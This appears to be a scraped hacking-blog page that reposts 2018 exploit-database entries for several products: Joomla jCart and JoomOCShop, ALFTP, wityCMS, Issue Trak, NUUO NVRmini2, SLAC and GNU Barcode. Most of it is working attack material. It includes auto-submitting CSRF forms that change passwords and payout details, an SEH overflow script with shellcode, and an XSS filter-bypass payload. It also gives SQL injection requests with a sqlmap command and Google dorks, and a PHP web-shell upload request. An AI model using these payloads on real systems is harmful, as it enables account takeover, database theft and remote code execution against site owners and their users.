# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 2.3.0.2
# Tested on: Kali linux
===================================================
# POC :
# Change user information exploit :
<html>
<body>
<form action="http://site.com/jcart/account/edit.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="firstname" value="D3C0DE" />
<input type="hidden" name="lastname" value="revenge" />
<input type="hidden" name="email" value="decod3.n@gmail.com" />
<input type="hidden" name="telephone" value="100000" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Change password exploit :
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="2468" />
<input type="hidden" name="confirm" value="2468" />
</form>
<script>
document.forms[0].submit();
</script>
# Change affiliate account information exploit :
<form action="http://site.com/jcart/account/affiliate/edit.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="company" value="decode" />
<input type="hidden" name="website" value="test.com" />
<input type="hidden" name="tax" value="100000000" />
<input type="hidden" name="payment" value="paypal" />
<input type="hidden" name="cheque" value=" " />
<input type="hidden" name="paypal" value="test@test.com" />
<input type="hidden" name="bank_name" value=" " />
<input type="hidden" name="bank_branch_number" value=" "
/>
<input type="hidden" name="bank_swift_code" value=" " />
<input type="hidden" name="bank_account_name" value=" " />
<input type="hidden" name="bank_account_number" value=" "
/>
</form>
<script>
document.forms[0].submit();
</script>
====================================================
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863570641
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323
# Tested on: Windows XP Professional SP3 -Version-2002
# Steps to reproduce-1: (eip overwrite-88-windows-XP)
# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'
#seh- 0041A6EF "\xEF\xA6\x41"
#address to jump 0012FA7A
#nseh- "\xEB\xAC\x90\x90"
#winexec address 0x7c862aed
#!/usr/bin/python
shellcode=("\x33\xC0"
"\x50"
"\x68\x63\x61\x6C\x63"
"\x8B\xC4"
"\x50"
"\xE8\x61\x30\x73\x7C")
buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41"
f=open("alftp.txt","w")
f.write(buf)
f.close()
# Exploit Title: wityCMS 0.6.1 Persistent XSS on "Website's name" field
# Date: 05/28/2018
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://creatiwity.net/witycms
# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.1
# Version: 0.6.1
# Tested on: Windows 10 x64 (XAMPP, Chrome)
# CVE: CVE-2018-11512
*Description
A persistent/stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general.
*Proof of Concept
1. Attacker logs in as an administrator of the site.
2. Attacker visits the Administrator page and clicks on the general options then settings menu.
3. Attacker enters the script below in the "Website's name" field:
<scri<script>pt>alert(1)</scri</script>pt>
Note: The "script" tag is being filtered but not recursively so having the first tag stripped off will still execute the one being combined.
3. Once the "Save" button is clicked, the payload will execute.
4. When an unauthenticated user visits the home page, the payload will also execute.
*Mitigation
See https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44
Timeline
2018-05-27-Vulnerability reported to wityCMS development team
2018-05-27-CVE requested from mitre.org
2018-05-28-wityCMS development team acknowledges and will be pushing the fix for production on 0.6.2
2015-05-28-CVE published by mitre: https://twitter.com/CVEnew/status/1001093385929805831
# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery
# Date: 2018-05-28
# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/
# Vendor Homepage: https://www.joomlaextensions.co.in/
# Version: 1.0
# Tested on: Kali linux
===================================================
# POC :
# Change user information exploit :
<html>
<body>
<form action="http://site.com/joomoc2/?route=account/edit" method="POST" enctype="multipart/form-data">
<input type="hidden" name="firstname" value="decode" />
<input type="hidden" name="lastname" value="revenge" />
<input type="hidden" name="email" value="decod3.n@gmail.com" />
<input type="hidden" name="telephone" value="100000" />
<input type="hidden" name="fax" value=" " />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Change password exploit :
<form action="http://site.com/jcart/account/password.html" method="POST" enctype="multipart/form-data">
<input type="hidden" name="password" value="test" />
<input type="hidden" name="confirm" value="test" />
</form>
<script>
document.forms[0].submit();
</script>
====================================================
================
Exploit Title: SQL Injection Vulnerability in Issue Trak <= 7.0 (Possibly applicable up to version 9.7)
Date: 05-28-2018
Vendor Homepage: http://issuetrak.com
Version: Confirmed 7.0; <= 7.0 extremely likely; up to 9.7 very likely
Google Dork: inurl:"IssueTrak" inurl:"asp"
Discovered By: Chris Anastasio
================
Vulnerable Endpoint
===================
www.example.com/IssueTrak/IssueSearch_Process.asp
Vulnerable Parameters
=====================
Status
Priority
inp_IssueType
SubmittedBy
EnteredBy
AssignedTo
AssignedBy
NextActionBy
ClosedBy
ProjectManager
inp_OrgID
Raw HTTP Request
===========================
POST /IssueTrak/IssueSearch_Process.asp HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 905
TestField=dummy&Mode=&Deleted=false&ReportID=x&Status=*&SubstatusID=&Priority=&inp_IssueType=&HiddenSubtype=&HiddenSubtype2=&inp_IssueSubTypeMem=-1&SearchAll=fds&Subject=&NoteText=&Solution=&UserDef1=&CSOneID=&CSTwoID=&UserDef3=&CSThreeID=&UserDef4=&CSFourID=&SubmittedBy=&EnteredBy=&AssignedTo=&EverAssignedTo=&AssignedBy=&NextActionBy=&ClosedBy=&ProjectManager=&inp_OrgID=&OrganizationIssues=&TaskAssignedTo=&method_TargetDate=&start_TargetDate=&end_TargetDate=&method_DateOpened=&start_DateOpened=&end_DateOpened=&method_DateClosed=&start_DateClosed=&end_DateClosed=&TimeOpen=&TimeOpenDays=More&AdjTimeOpen=&AdjTimeOpenDays=More&Hours=&TimeOpenHours=More&TaskDescription=&TaskAssignedToName=&method_TaskDateCompleted=&start_TaskDateCompleted=&end_TaskDateCompleted=&Title=&OutputOptions=BriefList&ShowCriteria=on&SortOn1=&SortOrder1=Asc&SortOn2=&SortOrder2=Asc&SortOn3=&SortOrder3=Asc
SQLMap command
==============
sqlmap -r issueTrakSearchReq.txt --dbms=mssql --level=5 --batch
Notes:
- "issueTrakSearchReq.txt" should be a plain text file containing the raw HTTP request shown above.
- The "Host" header of the HTTP request should be updated with an IP address that hosts an IssueTrak 7.0 installation.
Notes
=====
- A SQL injection vulnerability has been identified in IssueTrak 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the database.
- Authentication is generally required in order to hit this endpoint. If a non SQL injection request is made the reuslt is a redirect to the login page. However, it seems that on the back end, this request touches the database even without authentication, making it exploitable from a pre-authentication vantage point.
- IssueTrak 7.0 was released in 2006
Timeline
========
2018-05-18: Initial vendor contact
2018-05-21: Vendor implies that this version of IssueTrak is no longer supported. Also states that releases starting with 9.7 the application does not suffer from thsi vulnerability
2016-05-28: PoC details published
About Illumant
==============
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
# Exploit Title: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
# Google Dork: intitle:NUUO Network Video Recorder Login
# Date: 2018-05-20
# Exploit Author: M3@Pandas
# Vendor Homepage: http://www.nuuo.com
# Software Link: N/A
# Version: all
# Tested on: PHP Linux
# CVE : CVE-2018-11523
==========================
Advisory: NUUO NVRmini2 / NVRsolo Arbitrary File Upload Vulnerability
Author: M3@pandas From DBAppSecurity
Affected Version: All
==========================
Vulnerability Description
==========================
Recetly, I found an Arbitrary File Upload Vulnerability in 'NUUO NVRmini2' program, NVRmini2 is widely used all over
the world.
Vulnerable cgi: /upload.php
<?php
//echo $_FILES['userfile']['type'];
//echo ":";
//echo $_FILES['userfile']['size'];
//echo ":";
//echo urldecode($_FILES['userfile']['name']);
//echo ":";
//echo $_FILES['userfile']['tmp_name'];
//echo ":";
//echo $_FILES['userfile']['error'];
//echo ":";
echo $_FILES['userfile']['name'];
copy($_FILES["userfile"]["tmp_name"],$_FILES['userfile']['name']);
?>
As the code above, no any filter, so we can upload a php shell directly to the web server.
==========================
POC EXP
==========================
1. Upload 'nuuonvr.php' to web root path:
POST /upload.php HTTP/1.1
Host: 192.168.10.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: multipart/form-data; boundary=--------969849961
Content-Length: 162
----------969849961
Content-Disposition: form-data; name="userfile"; filename="nuuonvr.php"
?php phpinfo();@unlink(__FILE__);?
----------969849961--
2. Check if the php file is uploaded successfully:
GET http://192.168.10.1/nuuonvr.php
If the page returns phpinfo info, target is vulnerable!
# # # # #
# Exploit Title: SLAC v1.0: Blind SQL Injection / XPath Injection
# Date: 29-05-2018
# Vendor Homepage: https://sitemakin.com/login-script-demo
# Exploit Author: Divya Jain
# Version: v1.0
# CVE: CVE-2018-11535
# Category: Webapps
# Severity: High
# Tested on: KaLi LinuX_x64
# # # # #
# Proof of Concept:
////////////////////////////////////////////////
SQL Injection in "my_item_search" parameter
////////////////////////////////////////////////
# Affected Link: demo.com/login-script-demo/users.php
# Parameter "my_item_search" is exploitable using xpath injection
# Payload 1:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -
# Payload 2:
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -
# POC 1 (Result: Table_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 171
Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~access_level~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
# POC 2 (Result: Column_name)
/////////REQUEST//////////
POST /login-script-demo/users.php HTTP/1.1
Host: sitemakin.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.com/login-script-demo/users.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 175
Cookie: PHPSESSID=57a62feb015f8912f7eaa856166343db; _ga=GA1.2.496857143.1527491400; _gid=GA1.2.909440178.1527491400; _gat=1
Connection: close
Upgrade-Insecure-Requests: 1
my_item_search=1337'and extractvalue(5566,concat(0x7e,(select column_name from information_schema.columns where table_name="access_level" LIMIT 0,1),0x7e ))-- -&submit=Search
/////////RESPONSE//////////
<form method="post" action="/login-script-demo/users.php">
<select class="new-url2 form-control" name="my_item">
<br />
<b>Warning</b>: PDOStatement::execute(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>33</b><br />
<br />
<b>Warning</b>: main(): SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~id~' in <b>/home/sitemakin/public_html/login-script-demo/includes/post_users.inc.php</b> on line <b>34</b><br />
<option value="all">All</option>
################################################################################
# GNU Barcode 0.99 - Memory Leak
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Affected version: 0.99
# Tested on: Ubuntu 16.04.4
# Author: Gjoko 'LiquidWorm' Krstic
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: GNU Barcode suffers from a memory leak vulnerability, which can be exploited
# by malicious people to cause a DoS (Denial of Service). The vulnerability is
# caused due to an error in the 'cmdline.c', which can be exploited to cause a
# memory leak via a specially crafted file. The vulnerability is confirmed in
# version 0.99. Other versions may also be affected.
cmdline.c:
128: int commandline(struct commandline *args, int argc, char **argv,
129: char *errorhead)
130: {
131: struct commandline *ptr;
132: char *getopt_desc = (char *)calloc(512, 1);
133: int desc_offset = 0;
134: int opt, retval;
135: char *value;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -b id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128", scaled 1.00, encoded using "code 128-B"
% The space/bar succession is represented by the following widths (space first):
% 02112141341111132221411221212411211241142121224111122141142121132221421121412213212211231221231221231221231222211322212311122321142121421121221143212211231222231121122321142121212411411223212211231221231221231221231221231221231221122321341111112423212211224111211244112121341111411221122321212411122141112423212211232212232113112221321132331112
[
% height xpos ypos width height xpos ypos width
[75.00 11.00 15.00 1.85] [75.00 13.50 15.00 0.85]
[75.00 16.50 15.00 0.85] [70.00 21.50 20.00 0.85]
[70.00 27.00 20.00 3.85] [70.00 30.50 20.00 0.85]
[70.00 32.50 20.00 0.85] [70.00 35.50 20.00 2.85]
[70.00 40.00 20.00 1.85] [70.00 43.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 51.00 20.00 1.85]
[70.00 54.50 20.00 0.85] [70.00 57.50 20.00 0.85]
[70.00 62.00 20.00 3.85] [70.00 65.50 20.00 0.85]
[70.00 68.50 20.00 0.85] [70.00 71.00 20.00 1.85]
[70.00 76.50 20.00 0.85] [70.00 80.00 20.00 3.85]
[70.00 84.50 20.00 0.85] [70.00 87.50 20.00 0.85]
[70.00 91.00 20.00 1.85] [70.00 96.50 20.00 0.85]
[70.00 98.50 20.00 0.85] [70.00 101.00 20.00 1.85]
[70.00 104.50 20.00 0.85] [70.00 109.50 20.00 0.85]
[70.00 113.00 20.00 3.85] [70.00 117.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 128.00 20.00 1.85] [70.00 131.50 20.00 0.85]
[70.00 137.00 20.00 1.85] [70.00 139.50 20.00 0.85]
[70.00 142.50 20.00 0.85] [70.00 147.50 20.00 0.85]
[70.00 151.00 20.00 1.85] [70.00 154.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 162.00 20.00 1.85]
[70.00 164.50 20.00 0.85] [70.00 168.50 20.00 2.85]
[70.00 172.00 20.00 1.85] [70.00 175.50 20.00 0.85]
[70.00 179.50 20.00 2.85] [70.00 183.00 20.00 1.85]
[70.00 186.50 20.00 0.85] [70.00 190.50 20.00 2.85]
[70.00 194.00 20.00 1.85] [70.00 197.50 20.00 0.85]
[70.00 201.50 20.00 2.85] [70.00 205.00 20.00 1.85]
[70.00 209.00 20.00 1.85] [70.00 212.50 20.00 0.85]
[70.00 215.50 20.00 2.85] [70.00 220.00 20.00 1.85]
[70.00 223.50 20.00 0.85] [70.00 227.50 20.00 2.85]
[70.00 230.50 20.00 0.85] [70.00 233.00 20.00 1.85]
[70.00 237.50 20.00 2.85] [70.00 241.50 20.00 0.85]
[70.00 245.00 20.00 3.85] [70.00 249.50 20.00 0.85]
[70.00 252.50 20.00 0.85] [70.00 258.00 20.00 1.85]
[70.00 260.50 20.00 0.85] [70.00 263.50 20.00 0.85]
[70.00 267.00 20.00 1.85] [70.00 269.50 20.00 0.85]
[70.00 275.50 20.00 2.85] [70.00 279.50 20.00 0.85]
[70.00 283.00 20.00 1.85] [70.00 285.50 20.00 0.85]
[70.00 289.50 20.00 2.85] [70.00 293.00 20.00 1.85]
[70.00 297.00 20.00 1.85] [70.00 301.50 20.00 2.85]
[70.00 304.50 20.00 0.85] [70.00 307.50 20.00 0.85]
[70.00 310.00 20.00 1.85] [70.00 314.50 20.00 2.85]
[70.00 318.50 20.00 0.85] [70.00 322.00 20.00 3.85]
[70.00 326.50 20.00 0.85] [70.00 329.50 20.00 0.85]
[70.00 332.50 20.00 0.85] [70.00 337.00 20.00 3.85]
[70.00 340.50 20.00 0.85] [70.00 345.50 20.00 0.85]
[70.00 348.00 20.00 1.85] [70.00 352.50 20.00 2.85]
[70.00 356.50 20.00 0.85] [70.00 360.00 20.00 1.85]
[70.00 362.50 20.00 0.85] [70.00 366.50 20.00 2.85]
[70.00 370.00 20.00 1.85] [70.00 373.50 20.00 0.85]
[70.00 377.50 20.00 2.85] [70.00 381.00 20.00 1.85]
[70.00 384.50 20.00 0.85] [70.00 388.50 20.00 2.85]
[70.00 392.00 20.00 1.85] [70.00 395.50 20.00 0.85]
[70.00 399.50 20.00 2.85] [70.00 403.00 20.00 1.85]
[70.00 406.50 20.00 0.85] [70.00 410.50 20.00 2.85]
[70.00 414.00 20.00 1.85] [70.00 417.50 20.00 0.85]
[70.00 421.50 20.00 2.85] [70.00 425.00 20.00 1.85]
[70.00 428.50 20.00 0.85] [70.00 431.00 20.00 1.85]
[70.00 435.50 20.00 2.85] [70.00 439.50 20.00 0.85]
[70.00 445.00 20.00 3.85] [70.00 448.50 20.00 0.85]
[70.00 450.50 20.00 0.85] [70.00 452.50 20.00 0.85]
[70.00 457.00 20.00 3.85] [70.00 462.50 20.00 2.85]
[70.00 466.50 20.00 0.85] [70.00 470.00 20.00 1.85]
[70.00 472.50 20.00 0.85] [70.00 476.00 20.00 1.85]
[70.00 481.50 20.00 0.85] [70.00 483.50 20.00 0.85]
[70.00 486.50 20.00 0.85] [70.00 489.00 20.00 1.85]
[70.00 496.00 20.00 3.85] [70.00 499.50 20.00 0.85]
[70.00 502.50 20.00 0.85] [70.00 505.50 20.00 0.85]
[70.00 511.00 20.00 3.85] [70.00 514.50 20.00 0.85]
[70.00 516.50 20.00 0.85] [70.00 521.50 20.00 0.85]
[70.00 524.00 20.00 1.85] [70.00 527.50 20.00 0.85]
[70.00 530.00 20.00 1.85] [70.00 534.50 20.00 2.85]
[70.00 538.50 20.00 0.85] [70.00 541.50 20.00 0.85]
[70.00 546.00 20.00 3.85] [70.00 549.50 20.00 0.85]
[70.00 552.00 20.00 1.85] [70.00 555.50 20.00 0.85]
[70.00 560.50 20.00 0.85] [70.00 562.50 20.00 0.85]
[70.00 567.00 20.00 3.85] [70.00 572.50 20.00 2.85]
[70.00 576.50 20.00 0.85] [70.00 580.00 20.00 1.85]
[70.00 582.50 20.00 0.85] [70.00 586.50 20.00 2.85]
[70.00 591.00 20.00 1.85] [70.00 594.00 20.00 1.85]
[70.00 598.50 20.00 2.85] [70.00 602.50 20.00 0.85]
[70.00 605.50 20.00 2.85] [70.00 608.50 20.00 0.85]
[70.00 612.00 20.00 1.85] [70.00 615.50 20.00 0.85]
[70.00 620.00 20.00 1.85] [70.00 622.50 20.00 0.85]
[75.00 627.00 15.00 1.85] [75.00 632.50 15.00 2.85]
[75.00 635.50 15.00 0.85] [75.00 638.00 15.00 1.85]
] { {} forall setlinewidth moveto 0 exch rlineto stroke} bind forall
[
% char xpos ypos fontsize
[(o) 21.00 10.00 12.00]
[(/) 32.00 10.00 0.00]
[(c) 43.00 10.00 0.00]
[(r) 54.00 10.00 0.00]
[(a) 65.00 10.00 0.00]
[(s) 76.00 10.00 0.00]
[(h) 87.00 10.00 0.00]
[(e) 98.00 10.00 0.00]
[(s) 109.00 10.00 0.00]
[(/) 120.00 10.00 0.00]
[(i) 131.00 10.00 0.00]
[(d) 142.00 10.00 0.00]
[(:) 153.00 10.00 0.00]
[(0) 164.00 10.00 0.00]
[(0) 175.00 10.00 0.00]
[(0) 186.00 10.00 0.00]
[(0) 197.00 10.00 0.00]
[(3) 208.00 10.00 0.00]
[(4) 219.00 10.00 0.00]
[(,) 230.00 10.00 0.00]
[(s) 241.00 10.00 0.00]
[(i) 252.00 10.00 0.00]
[(g) 263.00 10.00 0.00]
[(:) 274.00 10.00 0.00]
[(0) 285.00 10.00 0.00]
[(6) 296.00 10.00 0.00]
[(,) 307.00 10.00 0.00]
[(s) 318.00 10.00 0.00]
[(r) 329.00 10.00 0.00]
[(c) 340.00 10.00 0.00]
[(:) 351.00 10.00 0.00]
[(0) 362.00 10.00 0.00]
[(0) 373.00 10.00 0.00]
[(0) 384.00 10.00 0.00]
[(0) 395.00 10.00 0.00]
[(0) 406.00 10.00 0.00]
[(0) 417.00 10.00 0.00]
[(,) 428.00 10.00 0.00]
[(o) 439.00 10.00 0.00]
[(p) 450.00 10.00 0.00]
[(:) 461.00 10.00 0.00]
[(h) 472.00 10.00 0.00]
[(a) 483.00 10.00 0.00]
[(v) 494.00 10.00 0.00]
[(o) 505.00 10.00 0.00]
[(c) 516.00 10.00 0.00]
[(,) 527.00 10.00 0.00]
[(r) 538.00 10.00 0.00]
[(e) 549.00 10.00 0.00]
[(p) 560.00 10.00 0.00]
[(:) 571.00 10.00 0.00]
[(1) 582.00 10.00 0.00]
[(2) 593.00 10.00 0.00]
[(8) 604.00 10.00 0.00]
] { {} forall dup 0.00 ne {
/Helvetica findfont exch scalefont setfont
} {pop} ifelse
moveto show} bind forall
% End barcode for "id:000034,sig:06,src:000000,op:havoc,rep:128"
showpage
%%Trailer
==2183==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 512 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca179a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x407be2 in commandline /home/lqwrm/research/barcode-0.99/cmdline.c:132
Direct leak of 55 byte(s) in 1 object(s) allocated from:
#0 0x7fcb3aca1602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x7fcb3a8ca489 in __strdup (/lib/x86_64-linux-gnu/libc.so.6+0x8b489)
SUMMARY: AddressSanitizer: 567 byte(s) leaked in 2 allocation(s).
# GNU Barcode 0.99 - Buffer Overflow
# Vendor: The GNU Project | Free Software Foundation, Inc.
# Product web page: https://www.gnu.org/software/barcode/
# https://directory.fsf.org/wiki/Barcode
# Author: Gjoko 'LiquidWorm' Krstic
# Tested on: Ubuntu 16.04.4
# Affected version: 0.99
# Summary: GNU Barcode is a tool to convert text strings to printed bars.
# It supports a variety of standard codes to represent the textual strings
# and creates postscript output.
# Desc: The vulnerability is caused due to a boundary error in the processing
# of an input file, which can be exploited to cause a buffer overflow when a
# user processes e.g. a specially crafted file. Successful exploitation could
# allow execution of arbitrary code on the affected machine.
code93.c:
165: strcat(partial, codeset[code]);
166: checksum_str[checksum_len++] = code;
167:
168: /* Encode the second character */
169: code = strchr(alphabet, shiftset2[(int)(text[i])]) - alphabet;
170: strcat(partial, codeset[code]);
171: checksum_str[checksum_len++] = code;
lqwrm@metalgear:~/research/barcode-0.99$ ./barcode -i id:000034,sig:06,src:000000,op:havoc,rep:128
%!PS-Adobe-2.0
%%Creator: "barcode", libbarcode sample frontend
%%DocumentPaperSizes: A4
%%EndComments
%%EndProlog
%%Page: 1 1
% Printing barcode for "W+G$A+M%KWWGWWWWWWWW9WW", scaled 1.00, encoded using "code 39"
% The space/bar succession is represented by the following widths (space first):
% 01311313111333111111113111313111111133131131313111131111311311311131311313111131111131313113111111331333111111133311111111111133131333111111133311111113331111111333111111133311111113331111111333111111133311111111133113111333111111133311111113111113311131131311
[
% height xpos ypos width height xpos ypos width
[75.00 10.50 15.00 0.85] [75.00 14.50 15.00 0.85]
[75.00 17.50 15.00 2.85] [75.00 21.50 15.00 2.85]
[75.00 24.50 15.00 0.85] [70.00 27.50 20.00 2.85]
[70.00 33.50 20.00 2.85] [70.00 36.50 20.00 0.85]
[70.00 38.50 20.00 0.85] [70.00 40.50 20.00 0.85]
[70.00 42.50 20.00 0.85] [70.00 46.50 20.00 0.85]
[70.00 48.50 20.00 0.85] [70.00 52.50 20.00 0.85]
[70.00 56.50 20.00 0.85] [70.00 58.50 20.00 0.85]
[70.00 60.50 20.00 0.85] [70.00 62.50 20.00 0.85]
[70.00 67.50 20.00 2.85] [70.00 71.50 20.00 2.85]
[70.00 74.50 20.00 0.85] [70.00 78.50 20.00 0.85]
[70.00 82.50 20.00 0.85] [70.00 86.50 20.00 0.85]
[70.00 88.50 20.00 0.85] [70.00 91.50 20.00 2.85]
[70.00 94.50 20.00 0.85] [70.00 96.50 20.00 0.85]
[70.00 100.50 20.00 0.85] [70.00 103.50 20.00 2.85]
[70.00 106.50 20.00 0.85] [70.00 110.50 20.00 0.85]
[70.00 112.50 20.00 0.85] [70.00 116.50 20.00 0.85]
[70.00 120.50 20.00 0.85] [70.00 123.50 20.00 2.85]
[70.00 127.50 20.00 2.85] [70.00 130.50 20.00 0.85]
[70.00 132.50 20.00 0.85] [70.00 136.50 20.00 0.85]
[70.00 138.50 20.00 0.85] [70.00 140.50 20.00 0.85]
[70.00 144.50 20.00 0.85] [70.00 148.50 20.00 0.85]
[70.00 152.50 20.00 0.85] [70.00 155.50 20.00 2.85]
[70.00 158.50 20.00 0.85] [70.00 160.50 20.00 0.85]
[70.00 162.50 20.00 0.85] [70.00 167.50 20.00 2.85]
[70.00 171.50 20.00 2.85] [70.00 177.50 20.00 2.85]
[70.00 180.50 20.00 0.85] [70.00 182.50 20.00 0.85]
[70.00 184.50 20.00 0.85] [70.00 187.50 20.00 2.85]
[70.00 193.50 20.00 2.85] [70.00 196.50 20.00 0.85]
[70.00 198.50 20.00 0.85] [70.00 200.50 20.00 0.85]
[70.00 202.50 20.00 0.85] [70.00 204.50 20.00 0.85]
[70.00 206.50 20.00 0.85] [70.00 211.50 20.00 2.85]
[70.00 215.50 20.00 2.85] [70.00 219.50 20.00 2.85]
[70.00 225.50 20.00 2.85] [70.00 228.50 20.00 0.85]
[70.00 230.50 20.00 0.85] [70.00 232.50 20.00 0.85]
[70.00 235.50 20.00 2.85] [70.00 241.50 20.00 2.85]
[70.00 244.50 20.00 0.85] [70.00 246.50 20.00 0.85]
[70.00 248.50 20.00 0.85] [70.00 251.50 20.00 2.85]
[70.00 257.50 20.00 2.85] [70.00 260.50 20.00 0.85]
[70.00 262.50 20.00 0.85] [70.00 264.50 20.00 0.85]
[70.00 267.50 20.00 2.85] [70.00 273.50 20.00 2.85]
[70.00 276.50 20.00 0.85] [70.00 278.50 20.00 0.85]
[70.00 280.50 20.00 0.85] [70.00 283.50 20.00 2.85]
[70.00 289.50 20.00 2.85] [70.00 292.50 20.00 0.85]
[70.00 294.50 20.00 0.85] [70.00 296.50 20.00 0.85]
[70.00 299.50 20.00 2.85] [70.00 305.50 20.00 2.85]
[70.00 308.50 20.00 0.85] [70.00 310.50 20.00 0.85]
[70.00 312.50 20.00 0.85] [70.00 315.50 20.00 2.85]
[70.00 321.50 20.00 2.85] [70.00 324.50 20.00 0.85]
[70.00 326.50 20.00 0.85] [70.00 328.50 20.00 0.85]
[70.00 331.50 20.00 2.85] [70.00 337.50 20.00 2.85]
[70.00 340.50 20.00 0.85] [70.00 342.50 20.00 0.85]
[70.00 344.50 20.00 0.85] [70.00 346.50 20.00 0.85]
[70.00 349.50 20.00 2.85] [70.00 354.50 20.00 0.85]
[70.00 357.50 20.00 2.85] [70.00 360.50 20.00 0.85]
[70.00 363.50 20.00 2.85] [70.00 369.50 20.00 2.85]
[70.00 372.50 20.00 0.85] [70.00 374.50 20.00 0.85]
[70.00 376.50 20.00 0.85] [70.00 379.50 20.00 2.85]
[70.00 385.50 20.00 2.85] [70.00 388.50 20.00 0.85]
[70.00 390.50 20.00 0.85] [70.00 392.50 20.00 0.85]
[70.00 395.50 20.00 2.85] [70.00 398.50 20.00 0.85]
[70.00 400.50 20.00 0.85] [70.00 403.50 20.00 2.85]
